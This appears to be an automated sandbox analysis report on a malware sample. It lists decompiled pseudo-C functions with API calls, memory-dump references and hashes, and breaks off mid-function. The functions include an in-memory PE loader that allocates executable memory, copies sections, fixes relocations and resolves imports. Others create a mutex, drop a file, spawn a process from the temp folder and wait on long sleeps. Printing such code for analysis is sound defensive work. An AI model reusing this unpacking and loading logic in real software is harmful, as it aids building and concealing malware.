                                • Instruction ID: e227e1178396003585923f979526c72ad7791703c8cdf5e963474d517e879b06
                                • Opcode Fuzzy Hash: 58a0d6c72bc6984039d2a2ecf4c9038545cb79c90ea8f2b82e46258bfba3e950
                                • Instruction Fuzzy Hash: 50F0E2322092607BE6340B2ABD0DF8B7F55EFC5732F104137F709A52E0C6744942C2A9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E022124A1() {
                                				void* _t24;
                                
                                				 *((intOrPtr*)(_t24 - 4)) = 0xffffffff;
                                				if( *(_t24 - 0x102c) != 0) {
                                					FindCloseChangeNotification( *(_t24 - 0x102c)); // executed
                                					 *(_t24 - 0x102c) = 0;
                                				}
                                				if( *(_t24 - 0x124c) != 0) {
                                					CloseHandle( *(_t24 - 0x124c));
                                				}
                                				if( *(_t24 - 0x1028) != 0) {
                                					HeapFree(GetProcessHeap(), 0,  *(_t24 - 0x1028));
                                				}
                                				 *[fs:0x0] =  *((intOrPtr*)(_t24 - 0x10));
                                				return  *((intOrPtr*)(_t24 - 0x1c));
                                			}




                                0x022124a4
                                0x022124b2
                                0x022124bb
                                0x022124c1
                                0x022124c1
                                0x022124d2
                                0x022124db
                                0x022124db
                                0x022124e8
                                0x022124fa
                                0x022124fa
                                0x02212506
                                0x02212513

                                APIs
                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 022124BB
                                • CloseHandle.KERNEL32(?), ref: 022124DB
                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 022124F3
                                • HeapFree.KERNEL32(00000000), ref: 022124FA
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: CloseHeap$ChangeFindFreeHandleNotificationProcess
                                • String ID:
                                • API String ID: 3129886909-0
                                • Opcode ID: 081d9282913e5d2ab6eedd70fb23327dd95e1eb90f7166ba2c6677e0cd275726
                                • Instruction ID: 0edf65d1b260a4c34373cca390d132b75aeaf968e6216f4f2c27d423d36559e8
                                • Opcode Fuzzy Hash: 081d9282913e5d2ab6eedd70fb23327dd95e1eb90f7166ba2c6677e0cd275726
                                • Instruction Fuzzy Hash: F1F01979D40269DBEB248BA4D84DBDEB7B0EB48325F004695E90996280C7744DE0CF60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 95%
                                			E00426BE7() {
                                				void* _t118;
                                				unsigned int _t119;
                                				void* _t133;
                                				unsigned int _t140;
                                				intOrPtr _t144;
                                				unsigned int _t151;
                                				unsigned int _t156;
                                				unsigned int _t161;
                                				unsigned int _t162;
                                				unsigned int _t164;
                                				unsigned int _t165;
                                				unsigned int _t167;
                                				void* _t173;
                                				intOrPtr _t174;
                                				void* _t177;
                                				intOrPtr* _t182;
                                				void* _t184;
                                				void* _t192;
                                				unsigned int _t194;
                                				void* _t195;
                                				unsigned int _t200;
                                				short* _t201;
                                				void* _t206;
                                				void* _t207;
                                				unsigned int _t212;
                                				intOrPtr* _t216;
                                				void* _t225;
                                				intOrPtr _t230;
                                				void* _t237;
                                				unsigned int _t240;
                                				unsigned int* _t243;
                                				void* _t248;
                                				void* _t249;
                                				intOrPtr _t250;
                                				void* _t251;
                                				void* _t252;
                                
                                				asm("enter 0x0, 0x0");
                                				_t250 =  *((intOrPtr*)(_t249 + 8));
                                				if( *((char*)(_t250 + 0x402773)) != 1) {
                                					while(1) {
                                						L29:
                                						_t118 = CreateMutexA(0, 0, _t250 + 0x401670);
                                						 *(_t250 + 0x4016c5) = _t118;
                                						_t119 =  *((intOrPtr*)(_t250 + 0x4014e7))(_t118);
                                						__eflags = _t119;
                                						if(_t119 <= 0) {
                                							break;
                                						}
                                						 *((intOrPtr*)(_t250 + 0x40145d))();
                                						 *((intOrPtr*)(_t250 + 0x401503))(0x2710);
                                					}
                                					_t200 = _t250 + 0x4044ec;
                                					__eflags =  *((char*)(_t250 + 0x402773));
                                					if( *((char*)(_t250 + 0x402773)) == 0) {
                                						_t200 =  *((intOrPtr*)(_t250 + 0x40168f)) + 0x34ec;
                                						__eflags = _t200;
                                					}
                                					__eflags =  *_t200 - 0x5a4d;
                                					if( *_t200 != 0x5a4d) {
                                						L62:
                                						 *((intOrPtr*)(_t250 + 0x40145d))( *(_t250 + 0x4016c5));
                                						L63:
                                						 *((intOrPtr*)(_t250 + 0x401503))(0x3e8);
                                						goto L63;
                                					} else {
                                						_t201 = _t200 +  *((intOrPtr*)(_t200 + 0x3c));
                                						__eflags =  *_t201 - 0x4550;
                                						if( *_t201 != 0x4550) {
                                							goto L62;
                                						}
                                						 *((intOrPtr*)(_t250 + 0x401693)) = _t201;
                                						 *((intOrPtr*)(_t250 + 0x40169b)) =  *((intOrPtr*)( *((intOrPtr*)(_t250 + 0x401693)) + 0x34));
                                						 *(_t250 + 0x4016a3) =  *( *((intOrPtr*)(_t250 + 0x401693)) + 6) & 0x0000ffff;
                                						_t133 = VirtualAlloc(0,  *((intOrPtr*)( *((intOrPtr*)(_t250 + 0x401693)) + 0x50)) + 0x1000100, 0x3000, 0x40);
                                						__eflags = _t133;
                                						if(_t133 == 0) {
                                							goto L62;
                                						}
                                						 *(_t250 + 0x401697) = _t133;
                                						_t237 = _t250 + 0x4044ec;
                                						__eflags =  *((char*)(_t250 + 0x402773));
                                						if( *((char*)(_t250 + 0x402773)) == 0) {
                                							_t237 =  *((intOrPtr*)(_t250 + 0x40168f)) + 0x34ec;
                                							__eflags = _t237;
                                						}
                                						memcpy( *(_t250 + 0x401697), _t237, 0xb400);
                                						_t252 = _t251 + 0xc;
                                						do {
                                							 *(_t250 + 0x4016a3) =  *(_t250 + 0x4016a3) - 1;
                                							_t206 =  *((intOrPtr*)(_t250 + 0x401693)) + 0xf8;
                                							_t207 = _t206 +  *(_t250 + 0x4016a3) * 0x28;
                                							 *((intOrPtr*)(_t250 + 0x4016a7)) =  *((intOrPtr*)(_t207 + 8));
                                							 *((intOrPtr*)(_t250 + 0x4016ab)) =  *((intOrPtr*)(_t207 + 0xc));
                                							 *(_t250 + 0x4016af) =  *(_t207 + 0x10);
                                							_t140 = _t250 + 0x4044ec;
                                							__eflags =  *((char*)(_t250 + 0x402773));
                                							if( *((char*)(_t250 + 0x402773)) == 0) {
                                								_t140 =  *((intOrPtr*)(_t250 + 0x40168f)) + 0x34ec;
                                								__eflags = _t140;
                                							}
                                							 *(_t250 + 0x4016b3) = _t140 +  *((intOrPtr*)(_t207 + 0x14));
                                							memcpy( *((intOrPtr*)(_t250 + 0x4016ab)) +  *(_t250 + 0x401697),  *(_t250 + 0x4016b3),  *(_t250 + 0x4016af));
                                							_t252 = _t252 + 0xc;
                                							__eflags =  *(_t250 + 0x4016a3);
                                						} while ( *(_t250 + 0x4016a3) != 0);
                                						_t144 =  *((intOrPtr*)( *((intOrPtr*)(_t250 + 0x401693)) + 0xa0));
                                						__eflags = 0x28;
                                						if(0x28 == 0) {
                                							L53:
                                							 *((intOrPtr*)(_t250 + 0x4016bd)) =  *((intOrPtr*)( *((intOrPtr*)(_t250 + 0x401693)) + 0x80));
                                							 *((intOrPtr*)(_t250 + 0x4016b9)) =  *((intOrPtr*)( *((intOrPtr*)(_t250 + 0x401693)) + 0x84));
                                							_t225 =  *((intOrPtr*)(_t250 + 0x4016bd)) +  *(_t250 + 0x401697);
                                							__eflags =  *(_t225 + 0x10);
                                							if( *(_t225 + 0x10) == 0) {
                                								goto L62;
                                							} else {
                                								goto L54;
                                							}
                                							while(1) {
                                								L54:
                                								_t151 = LoadLibraryExA( *(_t250 + 0x401697) +  *(_t225 + 0xc), 0, 0);
                                								__eflags = _t151;
                                								if(_t151 == 0) {
                                									goto L62;
                                								}
                                								 *(_t250 + 0x4016c1) = _t151;
                                								_t240 =  *(_t250 + 0x401697) +  *(_t225 + 0x10);
                                								__eflags = _t240;
                                								while(1) {
                                									_t156 =  *((intOrPtr*)(_t250 + 0x40143a))( *(_t250 + 0x4016c1), E00426FC0( *(_t250 + 0x401697) +  *_t240 + 2, _t250 + 0x4016b7, __eflags));
                                									__eflags = _t156;
                                									if(_t156 == 0) {
                                										goto L62;
                                									}
                                									 *_t240 = _t156;
                                									_t240 = _t240 + 4;
                                									__eflags =  *_t240;
                                									if(__eflags != 0) {
                                										continue;
                                									}
                                									_t225 = _t225 + 0x14;
                                									__eflags =  *(_t225 + 0xc);
                                									if( *(_t225 + 0xc) == 0) {
                                										L61:
                                										goto __eax;
                                									}
                                									__eflags =  *(_t225 + 0x10);
                                									if( *(_t225 + 0x10) == 0) {
                                										goto L61;
                                									}
                                									goto L54;
                                								}
                                								goto L62;
                                							}
                                							goto L62;
                                						}
                                						 *((intOrPtr*)(_t250 + 0x40169f)) = _t144 +  *(_t250 + 0x401697);
                                						_t212 =  *(_t250 + 0x401697) -  *((intOrPtr*)(_t250 + 0x40169b));
                                						__eflags = _t212;
                                						_t182 =  *((intOrPtr*)(_t250 + 0x40169f));
                                						while(1) {
                                							_t161 =  *(_t182 + 4);
                                							__eflags = _t161;
                                							if(_t161 == 0) {
                                								goto L53;
                                							}
                                							_t162 =  *(_t182 + 8) & 0x0000ffff;
                                							_t243 =  *(_t250 + 0x401697) +  *_t182 + (_t162 & 0x00000fff);
                                							_t212 = _t212;
                                							_t164 = (_t162 >> 0xc) - 1;
                                							__eflags = _t164;
                                							if(_t164 != 0) {
                                								_t165 = _t164 - 1;
                                								__eflags = _t165;
                                								if(_t165 != 0) {
                                									__eflags = _t165 == 1;
                                									if(_t165 == 1) {
                                										 *_t243 =  *_t243 + _t212;
                                										__eflags =  *_t243;
                                									}
                                									L52:
                                									asm("loop 0xffffffcb");
                                									_t182 = _t182 +  *(_t182 + 4);
                                									continue;
                                								}
                                								_t167 = _t212 & 0x0000ffff;
                                								L49:
                                								 *_t243 =  *_t243 + _t167;
                                								goto L52;
                                							}
                                							_t167 = _t212 >> 0x10;
                                							goto L49;
                                						}
                                						goto L53;
                                					}
                                				}
                                				_t192 =  *((intOrPtr*)(_t250 + 0x402774)) - 1;
                                				if(_t192 != 0) {
                                					_t248 = _t250 + 0x402778;
                                					memcpy( *(_t250 + 0x401254), _t248, _t192 + 1);
                                					_t251 = _t251 + 0xc;
                                				}
                                				_t6 = _t250 + 0x401e41; // 0x104d8d0c
                                				 *_t6 = _t250;
                                				 *((intOrPtr*)(_t250 + 0x401d34)) = _t250;
                                				 *((intOrPtr*)(_t250 + 0x401e0f)) = _t250;
                                				 *((intOrPtr*)(_t250 + 0x401e73)) = _t250;
                                				 *((intOrPtr*)(_t250 + 0x401ddd)) = _t250;
                                				_t173 =  *((intOrPtr*)(_t250 + 0x40151a))(0, _t250 + 0x402778, 0x1fe);
                                				if(_t173 == 0) {
                                					L10:
                                					_t230 =  *(_t250 + 0x401254) -  *((intOrPtr*)(_t250 + 0x402337));
                                					 *((intOrPtr*)(_t250 + 0x4016cd)) = _t230;
                                					_t194 = 5;
                                					_t216 = _t250 + 0x40233b;
                                					L11:
                                					while(1) {
                                						if(_t194 == 5) {
                                						}
                                						if(_t194 == 4) {
                                						}
                                						if(_t194 == 3) {
                                						}
                                						if(_t194 == 2) {
                                							_t248 = _t250 + 0x401d31;
                                						}
                                						if(_t194 == 1) {
                                							_t248 = _t250 + 0x401e0d;
                                						}
                                						_t184 = 4;
                                						while(1) {
                                							_t174 =  *_t216;
                                							if(_t174 != 0) {
                                								 *(_t174 + _t230) = _t248;
                                							}
                                							_t216 = _t216 + 4;
                                							_t184 = _t184 - 1;
                                							if(_t184 == 0) {
                                								break;
                                							}
                                						}
                                						_t194 = _t194 - 1;
                                						__eflags = _t194;
                                						if(_t194 == 0) {
                                							 *((intOrPtr*)(_t250 + 0x4016c9)) = 1;
                                							goto L29;
                                						}
                                						continue;
                                					}
                                				}
                                				_t195 = _t173;
                                				_t177 = _t173 - 1;
                                				while( *(_t250 + _t177 + 0x402778) != 0) {
                                					if( *(_t250 + _t177 + 0x402778) != 0x5c) {
                                						_t177 = _t177 - 1;
                                						continue;
                                					}
                                					_t177 = _t177 + 1;
                                					break;
                                				}
                                				_t248 = _t250 + _t177 + 0x402778;
                                				memcpy(_t250 + 0x401fda, _t248, _t195 - _t177);
                                				_t251 = _t251 + 0xc;
                                				goto L10;
                                			}







































                                0x00426be7
                                0x00426beb
                                0x00426bf5
                                0x00426cf6
                                0x00426cf6
                                0x00426d01
                                0x00426d08
                                0x00426d0e
                                0x00426d14
                                0x00426d17
                                0x00000000
                                0x00000000
                                0x00426d19
                                0x00426d24
                                0x00426d24
                                0x00426d2d
                                0x00426d33
                                0x00426d3a
                                0x00426d42
                                0x00426d42
                                0x00426d42
                                0x00426d48
                                0x00426d4d
                                0x00426fa7
                                0x00426fad
                                0x00426fb3
                                0x00426fb8
                                0x00000000
                                0x00426d53
                                0x00426d56
                                0x00426d58
                                0x00426d5d
                                0x00000000
                                0x00000000
                                0x00426d63
                                0x00426d78
                                0x00426d8d
                                0x00426db0
                                0x00426db6
                                0x00426db8
                                0x00000000
                                0x00000000
                                0x00426dbe
                                0x00426dc9
                                0x00426dcf
                                0x00426dd6
                                0x00426dde
                                0x00426dde
                                0x00426dde
                                0x00426dea
                                0x00426dea
                                0x00426dec
                                0x00426dec
                                0x00426e0c
                                0x00426e0d
                                0x00426e12
                                0x00426e1b
                                0x00426e24
                                0x00426e2a
                                0x00426e30
                                0x00426e37
                                0x00426e3f
                                0x00426e3f
                                0x00426e3f
                                0x00426e47
                                0x00426e65
                                0x00426e65
                                0x00426e67
                                0x00426e67
                                0x00426e7a
                                0x00426e80
                                0x00426e82
                                0x00426ef1
                                0x00426efd
                                0x00426f0f
                                0x00426f1b
                                0x00426f21
                                0x00426f25
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00426f2b
                                0x00426f2b
                                0x00426f39
                                0x00426f3f
                                0x00426f41
                                0x00000000
                                0x00000000
                                0x00426f43
                                0x00426f4c
                                0x00426f4c
                                0x00426f52
                                0x00426f6f
                                0x00426f75
                                0x00426f77
                                0x00000000
                                0x00000000
                                0x00426f79
                                0x00426f7b
                                0x00426f7e
                                0x00426f81
                                0x00000000
                                0x00000000
                                0x00426f83
                                0x00426f86
                                0x00426f8a
                                0x00426f94
                                0x00426fa5
                                0x00426fa5
                                0x00426f8c
                                0x00426f90
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00426f92
                                0x00000000
                                0x00426f52
                                0x00000000
                                0x00426f2b
                                0x00426e8a
                                0x00426e9a
                                0x00426e9a
                                0x00426ea0
                                0x00426ea6
                                0x00426ea6
                                0x00426ea9
                                0x00426eab
                                0x00000000
                                0x00000000
                                0x00426eb5
                                0x00426ecb
                                0x00426ecd
                                0x00426ece
                                0x00426ece
                                0x00426ecf
                                0x00426ed8
                                0x00426ed8
                                0x00426ed9
                                0x00426ee3
                                0x00426ee4
                                0x00426ee6
                                0x00426ee6
                                0x00426ee6
                                0x00426ee8
                                0x00426eea
                                0x00426eec
                                0x00000000
                                0x00426eec
                                0x00426edb
                                0x00426ede
                                0x00426ede
                                0x00000000
                                0x00426ede
                                0x00426ed3
                                0x00000000
                                0x00426ed3
                                0x00000000
                                0x00426ea6
                                0x00426d4d
                                0x00426c01
                                0x00426c04
                                0x00426c07
                                0x00426c13
                                0x00426c13
                                0x00426c13
                                0x00426c15
                                0x00426c15
                                0x00426c1b
                                0x00426c21
                                0x00426c27
                                0x00426c2d
                                0x00426c41
                                0x00426c49
                                0x00426c79
                                0x00426c7f
                                0x00426c85
                                0x00426c8d
                                0x00426c8f
                                0x00000000
                                0x00426c95
                                0x00426c98
                                0x00426c98
                                0x00426ca3
                                0x00426ca3
                                0x00426cae
                                0x00426cae
                                0x00426cb9
                                0x00426cbb
                                0x00426cbb
                                0x00426cc4
                                0x00426cc6
                                0x00426cc6
                                0x00426cce
                                0x00426cd0
                                0x00426cd0
                                0x00426cd4
                                0x00426cd8
                                0x00426cd8
                                0x00426cda
                                0x00426cdd
                                0x00426ce0
                                0x00000000
                                0x00000000
                                0x00426ce2
                                0x00426ce4
                                0x00426ce5
                                0x00426ce7
                                0x00426cf0
                                0x00000000
                                0x00426cf0
                                0x00000000
                                0x00426ce9
                                0x00426c95
                                0x00426c4b
                                0x00426c4d
                                0x00426c4e
                                0x00426c60
                                0x00426c65
                                0x00000000
                                0x00426c65
                                0x00426c62
                                0x00000000
                                0x00426c62
                                0x00426c6e
                                0x00426c77
                                0x00426c77
                                0x00000000

                                APIs
                                • CreateMutexA.KERNELBASE(00000000,00000000,?), ref: 00426D01
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00426DB0
                                • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 00426F39
                                  • Part of subcall function 00426FC0: KiUserExceptionDispatcher.NTDLL(?,00426F68), ref: 00426FC6
                                Memory Dump Source
                                • Source File: 00000000.00000002.314403919.0000000000426000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.314272065.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314281545.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314297689.0000000000402000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314331044.0000000000425000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314484210.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314601354.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Similarity
                                • API ID: AllocCreateDispatcherExceptionLibraryLoadMutexUserVirtual
                                • String ID:
                                • API String ID: 913672479-0
                                • Opcode ID: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                • Instruction ID: 9f1bb8188d91e9f79ab484a831c93494bfb5d522c638f8b2643c0863dc0d102b
                                • Opcode Fuzzy Hash: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                • Instruction Fuzzy Hash: 34B16B75A002998FDF10DF24DD44BA937A5FF44304F8A0426DC09AF3A0D77AAA95CB4E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 82%
                                			E0221377A(void* __ecx, void* __eflags) {
                                				void _v263;
                                				char _v264;
                                				intOrPtr _v268;
                                				char _v272;
                                				void _v399;
                                				char _v400;
                                				intOrPtr _v404;
                                				void _v4499;
                                				char _v4500;
                                				void* _t46;
                                				void* _t50;
                                				void* _t57;
                                				signed int _t60;
                                				void* _t71;
                                				void* _t75;
                                				void* _t81;
                                				intOrPtr _t86;
                                				void* _t93;
                                				void* _t94;
                                				void* _t99;
                                
                                				E02218060(0x1190, __ecx);
                                				_v264 = 0;
                                				memset( &_v263, 0, 0x40 << 2);
                                				asm("stosb");
                                				_v4500 = 0;
                                				memset( &_v4499, 0, 0x3ff << 2);
                                				asm("stosw");
                                				asm("stosb");
                                				_v400 = 0;
                                				memset( &_v399, 0, 0x1f << 2);
                                				asm("stosw");
                                				asm("stosb");
                                				_v272 = 0;
                                				_t105 = 0;
                                				_v268 = 0;
                                				_v404 = 0;
                                				_t46 = GlobalAlloc(0x40, 0x1f200); // executed
                                				 *0x2287d9c = _t46;
                                				 *0x2287d98 = 0x1e200;
                                				_t71 =  *0x2287d9c; // 0x51e930
                                				E0221772B(_t71, 0x21e2ab4, 0x1e200);
                                				E02212FFF(0,  &_v4500); // executed
                                				_t99 = _t94 + 0x34;
                                				while(1) {
                                					_t72 =  &_v4500;
                                					_t50 = E0220E329( &_v4500, _t105,  &_v4500, 3,  &_v272); // executed
                                					_t99 = _t99 + 0xc;
                                					_t105 = _t50;
                                					if(_t50 != 0) {
                                						break;
                                					}
                                					Sleep(0x4e20);
                                				}
                                				_v404 = 0;
                                				while(1) {
                                					__eflags = _v404 - 0xa;
                                					if(_v404 >= 0xa) {
                                						break;
                                					}
                                					_t60 = E022044CB(_t72);
                                					asm("cdq");
                                					_t72 = 0xfa;
                                					 *((char*)(_t93 + _v404 - 0x18c)) = (_t60 & 0x0000ffff) % 0xfa + 1;
                                					_t86 = _v404 + 1;
                                					__eflags = _t86;
                                					_v404 = _t86;
                                				}
                                				E022042EC( &_v400, 0xa,  &_v264);
                                				E022043C5(_v268, _v272,  &_v264);
                                				_t75 =  *0x2287d9c; // 0x51e930
                                				E0221772B(_t75 + 0x1d8f4,  &_v400, 0xa);
                                				_t81 =  *0x2287d9c; // 0x51e930
                                				 *((intOrPtr*)(_t81 + 0x434)) = _v272;
                                				_t57 =  *0x2287d9c; // 0x51e930
                                				__eflags = _t57 + 0x438;
                                				return E0221772B(_t57 + 0x438, _v268, _v272);
                                			}























                                0x02213782
                                0x02213788
                                0x0221379c
                                0x0221379e
                                0x0221379f
                                0x022137b3
                                0x022137b5
                                0x022137b7
                                0x022137b8
                                0x022137cc
                                0x022137ce
                                0x022137d0
                                0x022137d1
                                0x022137db
                                0x022137dd
                                0x022137e3
                                0x022137f4
                                0x022137fa
                                0x022137ff
                                0x02213813
                                0x0221381a
                                0x02213829
                                0x0221382e
                                0x02213831
                                0x0221383a
                                0x02213841
                                0x02213846
                                0x02213849
                                0x0221384b
                                0x00000000
                                0x00000000
                                0x02213852
                                0x02213852
                                0x0221385a
                                0x02213875
                                0x02213875
                                0x0221387c
                                0x00000000
                                0x00000000
                                0x0221387e
                                0x02213888
                                0x02213889
                                0x02213899
                                0x0221386c
                                0x0221386c
                                0x0221386f
                                0x0221386f
                                0x022138b2
                                0x022138cf
                                0x022138e0
                                0x022138ed
                                0x022138f5
                                0x02213901
                                0x02213915
                                0x0221391a
                                0x0221392c

                                APIs
                                • GlobalAlloc.KERNELBASE(00000040,0001F200), ref: 022137F4
                                  • Part of subcall function 02212FFF: CreateFileA.KERNELBASE(0221382E,40000000,00000002,00000000,?,00000020,00000000,?,0221382E), ref: 0221302B
                                  • Part of subcall function 02212FFF: WriteFile.KERNELBASE(000000FF,021E26B0,00000401,00000000,00000000), ref: 0221304E
                                  • Part of subcall function 02212FFF: FindCloseChangeNotification.KERNELBASE(000000FF), ref: 02213058
                                • Sleep.KERNEL32(00004E20), ref: 02213852
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: File$AllocChangeCloseCreateFindGlobalNotificationSleepWrite
                                • String ID: 0Q
                                • API String ID: 2599853223-1780094543
                                • Opcode ID: bf91edd51f130308e466751db6d1da595eaf7b4ffe7005ee6bfd9455acb631c7
                                • Instruction ID: ce76929321867407eab3f208d1877af0187920e5afb8bd6deaf3477e842c13fb
                                • Opcode Fuzzy Hash: bf91edd51f130308e466751db6d1da595eaf7b4ffe7005ee6bfd9455acb631c7
                                • Instruction Fuzzy Hash: 4641A8B5D10214ABDB14D7A4DC51FE9B3B9AB68300F0085E9E70DA7284EBB45E94CF91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • IsBadHugeWritePtr.KERNEL32(00000110,00000000), ref: 02208B3E
                                • Sleep.KERNEL32(00001770), ref: 02208B8E
                                • Sleep.KERNEL32(0001D4C0), ref: 02208BB0
                                • lstrcpy.KERNEL32(?,?), ref: 02208CD2
                                • Sleep.KERNEL32(0048001E), ref: 02208D9D
                                • Sleep.KERNEL32(001B7740), ref: 02208DAA
                                • RtlExitUserThread.NTDLL(00000000), ref: 02208DD0
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: Sleep$ExitHugeThreadUserWritelstrcpy
                                • String ID:
                                • API String ID: 2517864394-0
                                • Opcode ID: 0119b2f09912cb6191213884e8302542427715e5d4882cba6df1eeacfbe21a2c
                                • Instruction ID: d0d152b06ae306e56bb91006d7789ba52729a029d1b3b213ee9cca8ceb49d82d
                                • Opcode Fuzzy Hash: 0119b2f09912cb6191213884e8302542427715e5d4882cba6df1eeacfbe21a2c
                                • Instruction Fuzzy Hash: 524180B0E51119CBCB64CF90DCD47AAB3B1BF44304F4484E9E20A9628AD774AED5CF4A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 72%
                                			E00401435(void* __ecx, void* __edi, void* __eflags, void* _a12) {
                                				intOrPtr _v28;
                                				intOrPtr _v40;
                                				long _v44;
                                				char _v52;
                                				void _v4146;
                                				short _v4148;
                                				void* _t20;
                                				struct _IO_FILE* _t28;
                                				void* _t33;
                                
                                				E00401650(0x1030, __ecx);
                                				_v4148 = _v4148 & 0x00000000;
                                				memset( &_v4146, 0, 0x3ff << 2);
                                				asm("stosw"); // executed
                                				_t20 = E004014EB(); // executed
                                				if(_t20 == 0) {
                                					L4:
                                					return 0;
                                				}
                                				SetErrorMode(0x8003); // executed
                                				GetModuleFileNameW(0,  &_v4148, 0x104);
                                				if(E00401588( &_v4148,  &_v4148,  &_v52) == 1 && _v28 == 0x48489101) {
                                					_t28 =  &_v4148;
                                					__imp___wfopen(_t28, 0x403040); // executed
                                					if(_t28 != 0) {
                                						E00401000(_a12, _v40 - _v44, E004015E1(_t28, _v44, _v40 - _v44)); // executed
                                						_t33 = 1;
                                						return _t33;
                                					}
                                				}
                                			}












                                0x0040143d
                                0x00401442
                                0x00401458
                                0x0040145a
                                0x0040145c
                                0x00401464
                                0x004014bd
                                0x00000000
                                0x004014bd
                                0x0040146b
                                0x0040147f
                                0x0040149a
                                0x004014a5
                                0x004014b1
                                0x004014bb
                                0x004014dc
                                0x004014e6
                                0x00000000
                                0x004014e6
                                0x004014bb

                                APIs
                                  • Part of subcall function 004014EB: GetTempPathW.KERNEL32(00000104,?,?), ref: 00401527
                                  • Part of subcall function 004014EB: lstrlenW.KERNEL32(?), ref: 0040153A
                                  • Part of subcall function 004014EB: lstrlenW.KERNEL32(?), ref: 00401550
                                  • Part of subcall function 004014EB: CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,004017DA), ref: 00401570
                                  • Part of subcall function 004014EB: GetLastError.KERNEL32 ref: 00401576
                                • SetErrorMode.KERNELBASE(00008003), ref: 0040146B
                                • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 0040147F
                                  • Part of subcall function 00401588: _wfopen.MSVCRT ref: 00401592
                                • _wfopen.MSVCRT ref: 004014B1
                                Memory Dump Source
                                • Source File: 00000000.00000002.314281545.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.314272065.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314297689.0000000000402000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314331044.0000000000425000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314403919.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314484210.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314601354.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Similarity
                                • API ID: Error_wfopenlstrlen$CreateFileLastModeModuleNamePathProcessTemp
                                • String ID:
                                • API String ID: 1387098578-0
                                • Opcode ID: 699a823cd1aa0335894426f21163e42a31b1eaad549d774e9f9875b55d5fa839
                                • Instruction ID: 01e8a217c8b558288f5a1d2cbcf5def80e225c71c86d6d92af73ecd0454d4b8c
                                • Opcode Fuzzy Hash: 699a823cd1aa0335894426f21163e42a31b1eaad549d774e9f9875b55d5fa839
                                • Instruction Fuzzy Hash: 2D114272910109AFDF11EBE4DD85EEE77BCAB04759F10057AF601F11E1DAB99A808A24
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 60%
                                			E0220426A(void* __ecx) {
                                				signed int _v8;
                                				signed int _t16;
                                				void* _t25;
                                
                                				_v8 = 0;
                                				while(1 != 0) {
                                					_v8 = 0;
                                					while(_v8 < 0x186a0) {
